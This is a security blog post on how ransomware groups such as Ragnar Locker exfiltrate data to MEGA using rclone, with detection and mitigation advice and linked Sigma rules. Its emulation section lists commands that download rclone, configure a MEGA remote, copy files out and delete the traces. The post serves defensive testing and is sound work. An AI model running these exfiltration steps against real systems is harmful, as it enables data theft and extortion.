Threat Thursday - Exfiltration Over Web Service: Exfiltration to Cloud Storage

This #ThreatThursday is all about leveraging cloud storage to exfiltrate data. We also cover a tool that leaves credentials unsecured on the file system. In particular, we are going to look at how threat actors leverage cloud services like MEGA and use open source tools like rclone to exfiltrate data. This is a technique that is often done prior to ransomware attacks and used to extort the target companies into paying. As usual, we will cover Cyber Threat Intelligence, and Attack, Detect, and Respond.

Cyber Threat Intelligence

ADATA, the Taiwanese chip maker, had 700GB of data leaked by Ragnar Locker using the MEGA cloud service prior to the data being ransomed. This is called “Double Extortion”. Data is stolen and bits are posted online to entice the company to pay even if they try to restore their ransomed network from backups. We have covered multiple threat groups that perform double extortion such as Conti, DarkSide, Egregor, Ryuk, and Maze. These groups tend to exfiltrate the data through the same C2 channel.

In this #ThreatThursday, we are going to look at Exfiltration Over Web Service (MITRE ATT&CK T1567) and Exfiltration to Cloud Storage (MITRE ATT&CK T1567.002). Threat actors often use accounts in cloud storage providers such as MEGA to exfiltrate the data there and easily leak the data for extortion purposes.

‍
Observing a number of these attacks has shown that threat actors leverage an open source tool called rclone. As per their site, “Rclone is a command line program to manage files on cloud storage. It is a feature rich alternative to cloud vendors' web storage interfaces. Over 40 cloud storage products support rclone.”

Attack

The first step to exfiltrating data to a cloud storage account is identifying which web service to use and creating an account. Rclone supports over 40 different providers.  From an adversary emulation perspective, you will need to choose a provider that is allowed outbound on the target network. We will use MEGA for this example because that is what Ragnar Locker uses.

Emulation Steps

1. Check if rclone is being used on the system: powershell dir %USERPROFILE%\.config\rclone\rclone.conf
2. powershell mkdir %USERPROFILE%\.config
3. powershell mkdir %USERPROFILE%\.config\rclone
4. powershell "Invoke-Command -ScriptBlock { Invoke-WebRequest "https://github.com/scythe-io/community-threats/blob/master/CompoundActions/T1567.002%20-%20Exfiltration%20to%20Cloud%20Storage/src/rclone.zip?raw=true" -OutFile "$env:userprofile\.config\rclone\rclone.zip"}"
5. powershell Expand-Archive -Path "$env:userprofile\.config\rclone\rclone.zip" -DestinationPath $env:userprofile\.config\rclone\
6. Configure rclone with your credentials: %USERPROFILE%\.config\rclone\rclone.exe config create remote mega user <MEGA USER> pass <MEGA PASS>
7. Copy the files from the local system to the MEGA account: %USERPROFILE%\.config\rclone\rclone.exe copy source:sourcepath dest:destpath
8. Clean up: rmdir /Q /S "%USERPROFILE%\.config"

Detect & Respond

• As per MITRE ATT&CK Mitigations: M1021 Restrict Web-Based Content - Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services. You would need to go through the list of Rclone cloud services and block everything that your organization does not use.
• For detection, MITRE recommends: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.

• Sigma rule for rclone config creation (thanks @BeardofBinary): https://gist.github.com/beardofbinary/b46b87b7a2d9b7c0bd3e7aa918338b75 
• Sigma rule for rclone execution (thanks @BeardofBinary): https://gist.github.com/beardofbinary/fede0607e830aa1add8deda3d59d9a77 
• Sigma rule for detecting MEGA DNS Lookup (thanks @BeardofBinary): https://gist.github.com/beardofbinary/d46c3b4e37ba8b21a79a63fbf69c6411 
• Prevent the tool itself - not the best method but many organizations continue to focus on tools. Here are all the versions of rclone: https://downloads.rclone.org/

Conclusion

Writing effective detections for adversary behaviors is difficult when adversaries use legitimate tools with malicious intent. However, with security testing and detection tuning it is possible to limit the impact these tools will have on an organization. Security testing with adversary emulation allows for these types of techniques to be repeated until a detection is written and tuned to the environment. Attack, Detect, and Respond made it possible to generate a threat informed test, identify detection gaps, and outline mitigations and remediations for security teams to respond with.

This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.